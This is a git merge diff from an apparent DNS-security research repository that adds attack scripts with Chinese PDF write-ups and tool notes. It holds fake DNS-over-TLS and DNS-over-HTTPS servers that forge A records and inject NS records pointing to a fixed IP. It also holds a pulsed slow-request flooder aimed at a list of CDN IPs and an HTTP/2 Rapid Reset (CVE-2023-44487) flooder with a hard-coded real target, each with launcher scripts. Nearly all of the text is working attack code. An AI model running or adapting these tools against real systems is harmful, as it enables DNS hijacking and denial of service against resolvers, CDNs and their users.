Merge branch 'main' of https://git.mesalab.cn/handingkang/yydns

author: modikai <[email protected]> 2023-11-23 09:53:44 +0800
committer: modikai <[email protected]> 2023-11-23 09:53:44 +0800
commit: 769eda62ff0190a74426b9eac3928d7e629c2002 (patch)
tree: f21a20bb33689a0164f79ae78ed3e5ba40b0610e
parent: f2732ae21338349a4d5e87835b87af7d22fa696c (diff)
parent: 5e2681226f27af7fe85b4c1cc7f76879ec5be01e (diff)
25 files changed, 672 insertions, 0 deletions
diff --git a/att script/10/.gitkeep b/att script/10/.gitkeep
new file mode 100644
index 0000000..e69de29
--- /dev/null
+++ b/att script/10/.gitkeep
diff --git a/att script/10/DoT数据篡改.pdf b/att script/10/DoT数据篡改.pdf
new file mode 100644
index 0000000..d6acd8c
--- /dev/null
+++ b/att script/10/DoT数据篡改.pdf
diff --git a/att script/10/dot_stub.py b/att script/10/dot_stub.py
new file mode 100644
index 0000000..3c35dc7
--- /dev/null
+++ b/att script/10/dot_stub.py
@@ -0,0 +1,45 @@
+import socket
+import ssl
+import dns.message
+import dns.query
+import dns.rcode
+import argparse
+
+parser = argparse.ArgumentParser()
+parser.add_argument('-dot', '--dot', default='dns.alidns.com')
+args = parser.parse_args()
+print(f'DoT server: {args.dot}')
+upstream_server = '47.88.31.213'
+
+# 创建监听socket
+listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+listener.bind(('127.0.0.1', 53))
+
+# 创建TLS连接
+context = ssl.create_default_context()
+context.check_hostname = False
+context.verify_mode = ssl.CERT_NONE
+while True:
+        # 接收DNS请求
+    data, addr = listener.recvfrom(1024)
+    #print(dns.message.from_wire(data))
+    data = dns.message.from_wire(data)
+    if 'baidu' in data.question.__str__():
+        # print(data)
+        # print(addr)
+        print('DNS请求：', data.question)
+        # # 创建TLS连接并发送DNS请求到上游服务器
+        resp = dns.query.tls(
+            q=data,
+            where=upstream_server,
+            timeout=10,
+            ssl_context=context)
+        print('DNS响应：', resp.answer)
+        # with socket.create_connection((upstream_server,853)) as sock:
+        #     with context.wrap_socket(sock, server_hostname=upstream_server[0]) as tls_sock:
+        #         tls_sock.sendall(data.to_wire())
+        #         resp = tls_sock.recv(4096)
+
+        # 将上游服务器的响应发送回客户端
+        listener.sendto(resp.to_wire(), addr)
+        break
diff --git a/att script/10/fake_DoT.py b/att script/10/fake_DoT.py
new file mode 100644
index 0000000..4e45754
--- /dev/null
+++ b/att script/10/fake_DoT.py
@@ -0,0 +1,63 @@
+import argparse
+import asyncio
+import ssl
+import socket
+import dns.asyncquery
+import dns.message
+import dns.rcode
+import dns.flags
+import dns.message
+import dns.rrset
+from dnslib import DNSRecord
+
+async def handle_client(reader, writer):
+    request_data = await reader.read(1024)
+    request =  dns.message.from_wire(request_data[2:])
+    #print(request)
+    dns_request = dns.message.make_query(request.question[0].name, request.question[0].rdtype)
+    dns_request.id = request.id
+    #print(dns_request)
+    dns_response = await dns.asyncquery.udp(q=dns_request, port=53, where='223.5.5.5')
+    #print(dns_response)
+    if str(request.question[0].name) == tamper and int(request.question[0].rdtype) == 1:
+        print('---tamper---', tamper)
+        dns_response.answer = [dns.rrset.from_text(tamper, 3600, dns.rdataclass.IN, dns.rdatatype.A, '39.106.44.126')]
+    if str(request.question[0].name) == inject:
+        print('---inject---', inject)
+        dns_response.additional = [dns.rrset.from_text(inject,3600,dns.rdataclass.IN, dns.rdatatype.NS,'ns.'+inject.split('.',1)[1]),
+                                   dns.rrset.from_text('ns.'+inject.split('.',1)[1],3600,dns.rdataclass.IN, dns.rdatatype.A,ns)]
+    #print(dns_response)
+
+    response_data = dns_response
+    record_header = len(response_data.to_wire()).to_bytes(2, 'big')
+    # 构建完整的TLS响应数据
+    tls_response_data = record_header + response_data.to_wire()
+    writer.write(tls_response_data)
+    await writer.drain()
+    writer.close()
+
+async def start_server():
+    # 配置服务器参数
+    listen_address = '0.0.0.0'
+    listen_port = 853
+    CERT_FILE = "/usr/local/etc/unbound/cert_new4/app.crt"  # 替换为你的SSL证书文件路径
+    KEY_FILE = "/usr/local/etc/unbound/cert_new4/app.key"  # 替换为你的SSL密钥文件路径
+    context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
+    context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)
+    # 创建TCP服务器
+    server = await asyncio.start_server(
+        handle_client, listen_address, listen_port, ssl=context)
+
+    print(f'DoT server listening on {listen_address}:{listen_port}')
+    async with server:
+        await server.serve_forever()
+
+parser = argparse.ArgumentParser()
+parser.add_argument('-tamper', '--tamper', default='')
+parser.add_argument('-inject', '--inject', default='')
+parser.add_argument('-ns', '--ns', default='39.106.44.126')
+args = parser.parse_args()
+tamper = args.tamper +'.'
+inject = args.inject +'.'
+ns = args.ns
+asyncio.run(start_server())
+\ No newline at end of file
diff --git a/att script/11/.gitkeep b/att script/11/.gitkeep
new file mode 100644
index 0000000..e69de29
--- /dev/null
+++ b/att script/11/.gitkeep
diff --git a/att script/11/DoH数据注入.pdf b/att script/11/DoH数据注入.pdf
new file mode 100644
index 0000000..803611c
--- /dev/null
+++ b/att script/11/DoH数据注入.pdf
diff --git a/att script/11/fake_DoH.py b/att script/11/fake_DoH.py
new file mode 100644
index 0000000..02f3829
--- /dev/null
+++ b/att script/11/fake_DoH.py
@@ -0,0 +1,63 @@
+import argparse
+import base64
+import ssl
+import dns.asyncquery
+import dns.rcode
+import aiohttp
+import dns.message
+import dns.rrset
+from aiohttp import web
+
+DNS_SERVER_ADDRESS = '223.5.5.5'
+DNS_SERVER_PORT = 53
+
+async def doh_handler(request):
+    if request.method == "GET":
+        rquery = str(request.query).split(' ')[1]
+        #print(rquery)
+        rquery = rquery.ljust(len(rquery) + len(rquery) % 4, "=")
+        doh_request = dns.message.from_wire(base64.b64decode(rquery.encode("UTF8")))
+    else:
+        try:
+            doh_request = dns.message.from_wire(await request.read())
+        except :
+            return web.Response(text='Invalid DNS request', status=400)
+
+    dns_request = dns.message.make_query(doh_request.question[0].name, doh_request.question[0].rdtype)
+    dns_request.id = doh_request.id
+    # 发起DNS请求
+    dns_response = await dns.asyncquery.udp(q = dns_request, port=DNS_SERVER_PORT, where=DNS_SERVER_ADDRESS)
+    #print(dns_response)
+
+    if str(doh_request.question[0].name) == tamper and int(doh_request.question[0].rdtype)==1:
+        print('---tamper---',tamper)
+        dns_response.answer = [ dns.rrset.from_text(tamper,3600,dns.rdataclass.IN, dns.rdatatype.A,'39.106.44.126')]
+    if str(doh_request.question[0].name) == inject:
+        print('---inject---',inject)
+        dns_response.additional = [dns.rrset.from_text(inject,3600,dns.rdataclass.IN, dns.rdatatype.NS,'ns.'+inject.split('.',1)[1]),
+                                   dns.rrset.from_text('ns.'+inject.split('.',1)[1],3600,dns.rdataclass.IN, dns.rdatatype.A,ns)]
+    #print(dns_response)
+    # 构建HTTPS响应
+    response = web.Response(body=dns_response.to_wire())
+    response.content_type = 'application/dns-message'
+    return response
+
+
+parser = argparse.ArgumentParser()
+parser.add_argument('-tamper', '--tamper', default='')
+parser.add_argument('-inject', '--inject', default='')
+parser.add_argument('-ns', '--ns', default='39.106.44.126')
+args = parser.parse_args()
+tamper = args.tamper +'.'
+inject = args.inject +'.'
+ns = args.ns
+#print('tamper:',tamper)
+DOH_SERVER_URL = "https://dns.alidns.com/dns-query"
+CERT_FILE = "/usr/local/etc/unbound/cert_new4/app.crt"
+KEY_FILE = "/usr/local/etc/unbound/cert_new4/app.key"
+ssl_context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
+ssl_context.load_cert_chain(CERT_FILE, KEY_FILE)
+app = web.Application()
+app.router.add_get(path='/dns-query',handler=doh_handler)
+app.router.add_post(path='/dns-query',handler=doh_handler)
+web.run_app(app, host='127.0.0.1', port=8444, ssl_context=ssl_context)
+\ No newline at end of file
diff --git a/att script/12/.gitkeep b/att script/12/.gitkeep
new file mode 100644
index 0000000..e69de29
--- /dev/null
+++ b/att script/12/.gitkeep
diff --git a/att script/12/DoT数据注入.pdf b/att script/12/DoT数据注入.pdf
new file mode 100644
index 0000000..eec7498
--- /dev/null
+++ b/att script/12/DoT数据注入.pdf
diff --git a/att script/12/dot_stub.py b/att script/12/dot_stub.py
new file mode 100644
index 0000000..3c35dc7
--- /dev/null
+++ b/att script/12/dot_stub.py
@@ -0,0 +1,45 @@
+import socket
+import ssl
+import dns.message
+import dns.query
+import dns.rcode
+import argparse
+
+parser = argparse.ArgumentParser()
+parser.add_argument('-dot', '--dot', default='dns.alidns.com')
+args = parser.parse_args()
+print(f'DoT server: {args.dot}')
+upstream_server = '47.88.31.213'
+
+# 创建监听socket
+listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+listener.bind(('127.0.0.1', 53))
+
+# 创建TLS连接
+context = ssl.create_default_context()
+context.check_hostname = False
+context.verify_mode = ssl.CERT_NONE
+while True:
+        # 接收DNS请求
+    data, addr = listener.recvfrom(1024)
+    #print(dns.message.from_wire(data))
+    data = dns.message.from_wire(data)
+    if 'baidu' in data.question.__str__():
+        # print(data)
+        # print(addr)
+        print('DNS请求：', data.question)
+        # # 创建TLS连接并发送DNS请求到上游服务器
+        resp = dns.query.tls(
+            q=data,
+            where=upstream_server,
+            timeout=10,
+            ssl_context=context)
+        print('DNS响应：', resp.answer)
+        # with socket.create_connection((upstream_server,853)) as sock:
+        #     with context.wrap_socket(sock, server_hostname=upstream_server[0]) as tls_sock:
+        #         tls_sock.sendall(data.to_wire())
+        #         resp = tls_sock.recv(4096)
+
+        # 将上游服务器的响应发送回客户端
+        listener.sendto(resp.to_wire(), addr)
+        break
diff --git a/att script/12/fake_DoT.py b/att script/12/fake_DoT.py
new file mode 100644
index 0000000..4e45754
--- /dev/null
+++ b/att script/12/fake_DoT.py
@@ -0,0 +1,63 @@
+import argparse
+import asyncio
+import ssl
+import socket
+import dns.asyncquery
+import dns.message
+import dns.rcode
+import dns.flags
+import dns.message
+import dns.rrset
+from dnslib import DNSRecord
+
+async def handle_client(reader, writer):
+    request_data = await reader.read(1024)
+    request =  dns.message.from_wire(request_data[2:])
+    #print(request)
+    dns_request = dns.message.make_query(request.question[0].name, request.question[0].rdtype)
+    dns_request.id = request.id
+    #print(dns_request)
+    dns_response = await dns.asyncquery.udp(q=dns_request, port=53, where='223.5.5.5')
+    #print(dns_response)
+    if str(request.question[0].name) == tamper and int(request.question[0].rdtype) == 1:
+        print('---tamper---', tamper)
+        dns_response.answer = [dns.rrset.from_text(tamper, 3600, dns.rdataclass.IN, dns.rdatatype.A, '39.106.44.126')]
+    if str(request.question[0].name) == inject:
+        print('---inject---', inject)
+        dns_response.additional = [dns.rrset.from_text(inject,3600,dns.rdataclass.IN, dns.rdatatype.NS,'ns.'+inject.split('.',1)[1]),
+                                   dns.rrset.from_text('ns.'+inject.split('.',1)[1],3600,dns.rdataclass.IN, dns.rdatatype.A,ns)]
+    #print(dns_response)
+
+    response_data = dns_response
+    record_header = len(response_data.to_wire()).to_bytes(2, 'big')
+    # 构建完整的TLS响应数据
+    tls_response_data = record_header + response_data.to_wire()
+    writer.write(tls_response_data)
+    await writer.drain()
+    writer.close()
+
+async def start_server():
+    # 配置服务器参数
+    listen_address = '0.0.0.0'
+    listen_port = 853
+    CERT_FILE = "/usr/local/etc/unbound/cert_new4/app.crt"  # 替换为你的SSL证书文件路径
+    KEY_FILE = "/usr/local/etc/unbound/cert_new4/app.key"  # 替换为你的SSL密钥文件路径
+    context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
+    context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)
+    # 创建TCP服务器
+    server = await asyncio.start_server(
+        handle_client, listen_address, listen_port, ssl=context)
+
+    print(f'DoT server listening on {listen_address}:{listen_port}')
+    async with server:
+        await server.serve_forever()
+
+parser = argparse.ArgumentParser()
+parser.add_argument('-tamper', '--tamper', default='')
+parser.add_argument('-inject', '--inject', default='')
+parser.add_argument('-ns', '--ns', default='39.106.44.126')
+args = parser.parse_args()
+tamper = args.tamper +'.'
+inject = args.inject +'.'
+ns = args.ns
+asyncio.run(start_server())
+\ No newline at end of file
diff --git a/att script/7/.gitkeep b/att script/7/.gitkeep
new file mode 100644
index 0000000..e69de29
--- /dev/null
+++ b/att script/7/.gitkeep
diff --git a/att script/7/att_pending_cookie.py b/att script/7/att_pending_cookie.py
new file mode 100644
index 0000000..ce3e4de
--- /dev/null
+++ b/att script/7/att_pending_cookie.py
@@ -0,0 +1,127 @@
+import argparse
+import http.client
+import asyncio
+import base64
+import random
+import secrets
+import string
+from collections import Counter
+import sys
+import time
+import requests
+import dns.message
+import httpx
+import gzip
+import io
+import pandas as pd
+import tqdm
+from concurrent.futures import ThreadPoolExecutor
+import threading
+from dns.message import make_query
+
+def ge_cookie():
+    cookie = ""
+    for i in range(200):
+        cookie += ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(random.randint(4, 10)))+\
+                  "="''.join(random.choice(string.ascii_letters + string.digits) for _ in range(random.randint(8, 20)))+"; "
+    cookie = cookie[:-2]
+    #print(sys.getsizeof(cookie)/1024)
+    return cookie
+
+def send_request(event,url,t,latency,stime):
+    cookie = ge_cookie()
+    headers = {"content-type": "application/dns-message",
+               "accept": "application/dns-message",
+               "Surrogate-Control": "max-age=0", "Cache-Control": "max-age=0",
+               "Cookie":cookie}
+    message = dns.message.make_query(base64.b64encode(url.encode("utf-8")).decode("utf-8") +
+                                     ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(8))+ ".google.com", "A")
+    message.flags |= dns.flags.RD
+    dns_req = base64.b64encode(message.to_wire()).decode("UTF8").rstrip("=")
+    # time.sleep(t*2)
+    conn = http.client.HTTPConnection(url, port=80)
+
+
+    #time.sleep(3)
+    body = ','.join([f'{name}: {value}' for name, value in headers.items()])
+    request_line = "GET /dns-query?dns=" + f"{dns_req} HTTP/1.1\r\n"
+    conn.send(request_line.encode())
+    headers0 = {'host': 'www.doeresearch.site'}
+    headers0 = ''.join([f'{name}: {value}\r\n' for name, value in headers0.items()])
+    conn.send(headers0.encode())
+
+    #time.sleep(10)
+    #body = str(make_query(qname="baidu.com", rdtype="A", want_dnssec=False))
+    #print(body)
+    #print(len(body))
+    chunk_size = 20 # 每个块的大小
+    for i in range(0, len(body), chunk_size):
+        #print(i,'------------------')
+        chunk = body[i:i + chunk_size]
+        conn.send(f'{chunk}'.encode())
+        start_time = time.perf_counter()
+        while time.perf_counter() - start_time < 0.002:
+            pass
+        # print('P')
+    conn.send(b'\r\n')
+    # 发送结束标志
+    #print(url, t, 'pending')
+    desired_time = latency / 2000  # 将毫秒转换为秒
+    #conn.close()
+    #time.sleep(10)
+    event.wait()
+    # start_time = time.perf_counter()
+    # while time.perf_counter() - start_time < desired_time:
+    #     pass
+    #conn.send(b'0\r\n\r\n')
+    conn.send(b'\r\n')
+    # Get the response
+    #response = conn.getresponse()
+    # print(response.status, response.reason)
+    #print(response.read())
+    # print(dns.message.from_wire(response.read()))
+
+    #conn.close()
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser()
+    parser.add_argument('-stime', '--stime')
+    parser.add_argument('-round', '--round',default=10)
+    parser.add_argument('-wait', '--wait',default=180)
+    args = parser.parse_args()
+
+
+    path = '/root/Nora/cdn/'
+    #path = 'D:\Volumes\调研\项目\YYDNS\GJ\DDOS/'
+    df = pd.read_csv(path+'fastly_att.csv',nrows=64)
+    data = df.set_index('ip')['latency'].to_dict()
+    event = threading.Event()
+    s_time = time.time()
+    #stime = time.perf_counter()
+    stime = float(args.stime)
+    round = int(args.round)
+    wait_time = int(args.wait)
+    threads = []
+    for i in range(round):
+        for ip, latency in data.items():
+            t = threading.Thread(target=send_request, args=(event,ip, i, latency,stime))
+            t.start()
+            threads.append(t)
+            #time.sleep(latency)
+        start_time = time.perf_counter()
+        # while time.perf_counter() - start_time < 0.1:
+        #     pass
+    print('all waiting')
+    while time.perf_counter() - stime < wait_time:
+        pass
+    # 触发事件，同时释放所有线程
+    event.set()
+    # 等待所有线程完成
+    for t in threads:
+        t.join()
+    print('ATT over:',time.time() - s_time)
+    #for i in tqdm.tqdm(range(1000)):
+    #send_request("151.101.76.204",0,0,0)
+
+
+
diff --git a/att script/7/start_pending.py b/att script/7/start_pending.py
new file mode 100644
index 0000000..5e7edf0
--- /dev/null
+++ b/att script/7/start_pending.py
@@ -0,0 +1,20 @@
+import os
+import argparse
+import time
+
+parser = argparse.ArgumentParser()
+parser.add_argument('-n', '--n', default=3)
+parser.add_argument('-round', '--round', default=5)
+parser.add_argument('-wait', '--wait', default=150)
+args = parser.parse_args()
+stime = time.perf_counter()
+round = int(args.round)
+wait_time = int(args.wait)
+for i in range(int(args.n)):
+    #print(f"python3 cve44487.py -s {i}")
+    os.popen(f"python att_pending_cookie.py -stime {stime} -round {round} -wait {wait_time}")
+while True:
+    current_time = time.perf_counter()
+    elapsed_time = current_time - stime
+    print(f"经过的时间：{elapsed_time:.2f}秒", end="\r")
+    time.sleep(1)  # 暂停一秒钟
+\ No newline at end of file
diff --git a/att script/7/脉冲拒绝服务.pdf b/att script/7/脉冲拒绝服务.pdf
new file mode 100644
index 0000000..9f938c9
--- /dev/null
+++ b/att script/7/脉冲拒绝服务.pdf
diff --git a/att script/8/.gitkeep b/att script/8/.gitkeep
new file mode 100644
index 0000000..e69de29
--- /dev/null
+++ b/att script/8/.gitkeep
diff --git a/att script/8/HTTP2快速重置拒绝服务.pdf b/att script/8/HTTP2快速重置拒绝服务.pdf
new file mode 100644
index 0000000..b9198d5
--- /dev/null
+++ b/att script/8/HTTP2快速重置拒绝服务.pdf
diff --git a/att script/8/cve44487.py b/att script/8/cve44487.py
new file mode 100644
index 0000000..5154f06
--- /dev/null
+++ b/att script/8/cve44487.py
@@ -0,0 +1,152 @@
+import random
+import ssl
+import string
+import sys
+import csv
+import socket
+import argparse
+import time
+import dns.message
+from datetime import datetime
+from urllib.parse import urlparse
+from http.client import HTTPConnection, HTTPSConnection
+import base64
+from dns.message import make_query
+import tqdm
+from h2.connection import H2Connection
+from h2.config import H2Configuration
+import h2.events
+import httpx
+import requests
+import asyncio
+import warnings
+
+warnings.filterwarnings("ignore")
+async def multi_h2(id_start,conn,h2_conn,host,dns_req):
+    for stream_id in tqdm.tqdm(range(id_start,id_start+1000000,2)):
+        #print('stream_id',stream_id)
+        headers = [(':method', 'GET'), (':authority', host), (':scheme', 'https'),
+                   (':path', '/dns-query' + '?dns=' + dns_req),
+                   ("accept", "application/dns-message"),
+                   ("content-type", "application/dns-message")]
+        #print(headers)
+        h2_conn.send_headers(stream_id, headers)
+        conn.send(h2_conn.data_to_send())
+
+        h2_conn.reset_stream(stream_id)
+        conn.send(h2_conn.data_to_send())
+
+
+
+
+def send_rst_stream_h2(host, sid,port=443, uri_path='/dns-query', timeout=5, proxy=None):
+    """
+    Send an RST_STREAM frame to the given host and port.
+    Parameters:
+        host (str): The hostname.
+        port (int): The port number.
+        stream_id (int): The stream ID to reset.
+        uri_path (str): The URI path for the GET request.
+        timeout (int): The timeout in seconds for the socket connection.
+        proxy (str): The proxy URL, if any.
+    Returns:
+        tuple: (status, message)
+        status: 1 if successful, 0 if no response, -1 otherwise.
+        message: Additional information or error message.
+    """
+
+    body = make_query(qname="baidu.com", rdtype="A", want_dnssec=False).to_wire()
+
+    #try:
+    # Create an SSL context to ignore SSL certificate verification
+    ssl_context = ssl.create_default_context(purpose=ssl.Purpose.SERVER_AUTH)
+    ssl_context.options |= (
+            ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 | ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
+    )
+    ssl_context.options |= ssl.OP_NO_COMPRESSION
+    ssl_context.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:DHE+AESGCM:DHE+CHACHA20")
+    ssl_context.set_alpn_protocols(['h2'])
+    ssl_context.check_hostname = False
+    ssl_context.verify_mode = ssl.CERT_NONE
+
+    # Create a connection based on whether a proxy is used
+    conn = HTTPSConnection(host, port, timeout=timeout, context=ssl_context)
+    conn.connect()
+    #time.sleep(2)
+    # Initiate HTTP/2 connection
+    config = H2Configuration(client_side=True)
+    h2_conn = H2Connection(config=config)
+    h2_conn.initiate_connection()
+    conn.send(h2_conn.data_to_send())
+    #time.sleep(2)
+    # Send GET request headers
+    #time.sleep(2)
+    # Listen for frames and send RST_STREAM when appropriate
+    #print(sid)
+    flag = 0
+    s_time = time.time()
+    #for stream_id in tqdm.tqdm(range(sid*999999,sid*999999+1000000,2)):
+    for stream_id in range(sid * 999999, sid * 999999 + 200000, 2):
+        # flag += 1
+        # if time.time()-s_time>1:
+        #     print(flag)
+        #     break
+        # if flag>50:
+        #     data = conn.sock.recv(65535)
+        #     start_time = time.perf_counter()
+        #     while time.perf_counter() - start_time < 0.1:
+        #         pass
+            #flag = 0
+        #print('stream_id',stream_id)
+        suff = base64.b64encode(str(stream_id).encode("utf-8")).decode("utf-8")+ ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(8))
+        message = dns.message.make_query(f"{suff}.www.baidu.com", "A")
+        message.flags |= dns.flags.RD
+        dns_req = base64.b64encode(message.to_wire()).decode("UTF8").rstrip("=")
+
+        headers = [(':method', 'GET'), (':authority', host), (':scheme', 'https'),
+                   (':path', uri_path + '?dns=' + dns_req),
+                   ("accept", "application/dns-message"),
+                   ("content-type", "application/dns-message")]
+
+        # headers = [(':method', 'POST'), (':authority', host), (':scheme', 'https'),
+        #            (':path', uri_path),
+        #            ("accept", "application/dns-message"),
+        #            ("content-type", "application/dns-message")]
+        #print(headers)
+        h2_conn.send_headers(stream_id, headers)
+        conn.send(h2_conn.data_to_send())
+        # h2_conn.send_data(stream_id, body)
+        # conn.send(h2_conn.data_to_send())
+        h2_conn.end_stream(stream_id)
+        conn.send(h2_conn.data_to_send())
+        # data = conn.sock.recv(100)
+        # events = h2_conn.receive_data(data)
+        # print('events:\n', events)
+        # start_time = time.perf_counter()
+        # while time.perf_counter() - start_time < 0.05:
+        #     pass
+        h2_conn.reset_stream(stream_id)
+        conn.send(h2_conn.data_to_send())
+
+
+        #break
+    conn.close()
+    return ("over")
+    # except Exception as e:
+    #     print('error------------')
+    #     return (-1, f"send_rst_stream_h2 ---- {e}")
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser()
+    parser.add_argument('-s', '--sid',default=1)
+    args = parser.parse_args()
+
+    targets = ["8.218.236.77"]
+    #targets = ['108.61.195.177']
+    for i in targets:
+
+        now = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
+        print(now,f"Checking {i}...", file=sys.stderr)
+        send_rst_stream_h2(i,int(args.sid))
+        #print("send rst stream:", resp, err2)
+
diff --git a/att script/8/start_reset_att.py b/att script/8/start_reset_att.py
new file mode 100644
index 0000000..b61fc2d
--- /dev/null
+++ b/att script/8/start_reset_att.py
@@ -0,0 +1,26 @@
+import argparse
+import os
+import time
+
+parser = argparse.ArgumentParser()
+parser.add_argument('-n', '--n', default=1)
+args = parser.parse_args()
+
+streams = [1, 3, 5, 7, 9, 11, 13, 15, 17, 19,21,23,25,27,29,31]
+for i in streams[:int(args.n)]:
+    #print(f"python3 cve44487.py -s {i}")
+    os.popen(f"python cve44487.py -s {i}")
+
+# for j in range(100):
+#     for i in streams[:int(args.n)]:
+#     #     #print(f"python3 cve44487.py -s {i}")
+#         os.popen(f"python cve44487.py -s {i}")
+#     start_time = time.perf_counter()
+#     while time.perf_counter() - start_time < 0.1:
+#         pass
+#     for i in streams[int(args.n):]:
+#         #     #print(f"python3 cve44487.py -s {i}")
+#         os.popen(f"python cve44487.py -s {i}")
+#     start_time = time.perf_counter()
+#     while time.perf_counter() - start_time < 1:
+#         pass
+\ No newline at end of file
diff --git a/att script/9/.gitkeep b/att script/9/.gitkeep
new file mode 100644
index 0000000..e69de29
--- /dev/null
+++ b/att script/9/.gitkeep
diff --git a/att script/9/10/.gitkeep b/att script/9/10/.gitkeep
new file mode 100644
index 0000000..e69de29
--- /dev/null
+++ b/att script/9/10/.gitkeep
diff --git a/att script/9/DoH数据篡改.pdf b/att script/9/DoH数据篡改.pdf
new file mode 100644
index 0000000..a5237fa
--- /dev/null
+++ b/att script/9/DoH数据篡改.pdf
diff --git a/att script/9/fake_DoH.py b/att script/9/fake_DoH.py
new file mode 100644
index 0000000..02f3829
--- /dev/null
+++ b/att script/9/fake_DoH.py
@@ -0,0 +1,63 @@
+import argparse
+import base64
+import ssl
+import dns.asyncquery
+import dns.rcode
+import aiohttp
+import dns.message
+import dns.rrset
+from aiohttp import web
+
+DNS_SERVER_ADDRESS = '223.5.5.5'
+DNS_SERVER_PORT = 53
+
+async def doh_handler(request):
+    if request.method == "GET":
+        rquery = str(request.query).split(' ')[1]
+        #print(rquery)
+        rquery = rquery.ljust(len(rquery) + len(rquery) % 4, "=")
+        doh_request = dns.message.from_wire(base64.b64decode(rquery.encode("UTF8")))
+    else:
+        try:
+            doh_request = dns.message.from_wire(await request.read())
+        except :
+            return web.Response(text='Invalid DNS request', status=400)
+
+    dns_request = dns.message.make_query(doh_request.question[0].name, doh_request.question[0].rdtype)
+    dns_request.id = doh_request.id
+    # 发起DNS请求
+    dns_response = await dns.asyncquery.udp(q = dns_request, port=DNS_SERVER_PORT, where=DNS_SERVER_ADDRESS)
+    #print(dns_response)
+
+    if str(doh_request.question[0].name) == tamper and int(doh_request.question[0].rdtype)==1:
+        print('---tamper---',tamper)
+        dns_response.answer = [ dns.rrset.from_text(tamper,3600,dns.rdataclass.IN, dns.rdatatype.A,'39.106.44.126')]
+    if str(doh_request.question[0].name) == inject:
+        print('---inject---',inject)
+        dns_response.additional = [dns.rrset.from_text(inject,3600,dns.rdataclass.IN, dns.rdatatype.NS,'ns.'+inject.split('.',1)[1]),
+                                   dns.rrset.from_text('ns.'+inject.split('.',1)[1],3600,dns.rdataclass.IN, dns.rdatatype.A,ns)]
+    #print(dns_response)
+    # 构建HTTPS响应
+    response = web.Response(body=dns_response.to_wire())
+    response.content_type = 'application/dns-message'
+    return response
+
+
+parser = argparse.ArgumentParser()
+parser.add_argument('-tamper', '--tamper', default='')
+parser.add_argument('-inject', '--inject', default='')
+parser.add_argument('-ns', '--ns', default='39.106.44.126')
+args = parser.parse_args()
+tamper = args.tamper +'.'
+inject = args.inject +'.'
+ns = args.ns
+#print('tamper:',tamper)
+DOH_SERVER_URL = "https://dns.alidns.com/dns-query"
+CERT_FILE = "/usr/local/etc/unbound/cert_new4/app.crt"
+KEY_FILE = "/usr/local/etc/unbound/cert_new4/app.key"
+ssl_context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
+ssl_context.load_cert_chain(CERT_FILE, KEY_FILE)
+app = web.Application()
+app.router.add_get(path='/dns-query',handler=doh_handler)
+app.router.add_post(path='/dns-query',handler=doh_handler)
+web.run_app(app, host='127.0.0.1', port=8444, ssl_context=ssl_context)
+\ No newline at end of file
diff --git a/monitor/doe/monitor.md b/monitor/doe/monitor.md
new file mode 100644
index 0000000..06dd7c8
--- /dev/null
+++ b/monitor/doe/monitor.md
@@ -0,0 +1,2 @@
+nload	带宽实时统计工具		统计攻击启动后，攻击服务器和受害服务器的带宽消耗情况  
+htop	资源占用实时统计工具	3.0.5	统计攻击启动后受害服务器的带宽消耗情况  
diff --git a/peishi/doe/peishi.md b/peishi/doe/peishi.md
new file mode 100644
index 0000000..ff83641
--- /dev/null
+++ b/peishi/doe/peishi.md
@@ -0,0 +1,3 @@
+|dnsdist    |    DNS负载均衡器和流量管理器    |1.6.1|用于搭建加密DNS服务器  
+|bind9	|DNS服务器	|9.19.16-1+ubuntu22.04.1+isc+1-Ubuntu	|用于搭建加密DNS服务器  
+|Chrome浏览器	|网络浏览器	|118.0.5993.118	|验证中间人攻击效果
author	modikai <[email protected]>	2023-11-23 09:53:44 +0800
committer	modikai <[email protected]>	2023-11-23 09:53:44 +0800
commit	769eda62ff0190a74426b9eac3928d7e629c2002 (patch)
tree	f21a20bb33689a0164f79ae78ed3e5ba40b0610e
parent	f2732ae21338349a4d5e87835b87af7d22fa696c (diff)
parent	5e2681226f27af7fe85b4c1cc7f76879ec5be01e (diff)